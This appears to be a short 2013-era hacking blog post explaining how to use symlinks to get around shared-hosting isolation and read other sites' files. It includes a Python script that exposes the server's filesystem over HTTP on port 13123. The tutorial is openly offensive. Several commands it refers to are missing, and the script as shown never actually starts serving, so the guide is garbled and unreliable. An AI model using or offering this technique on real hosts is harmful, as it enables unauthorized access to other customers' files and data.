Skip to main content

Server Bypass via Symlink - Jumping in server 2013

As we all know, symlinking it's on of greates methods for bypassing server security, mean to read files of other site in same shared host.

For getting success with this tutorial are required the following things:
  • Python Installed on Server
  • And some scripts u will see below.

This idea have start from devilzc0de geeks and let me explain how it work.

Here we are in folder /var/www/dono and trying to go into /www/

No permissions to go into /www .
Before we got tired by trying the commands u must check if if python it's installed with command :

Now take this python script and name it as , It's a little python script who will open a new port on server SimpleHTTPServer ( python ) module. Default port from script it's 13123 .

    #!/usr/bin/env python
    import SimpleHTTPServer
    import SocketServer
    import os
    port = 13123
    if __name__=='__main__':
            Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
            httpd = SocketServer.TCPServer(("", port), Handler)
            print("Now open this server on webbrowser at port : " + str(port))
            print("example:" + str(port))


Next u wil need to run the script by following command


open the site with port 13123



And enjoy The symilinking :)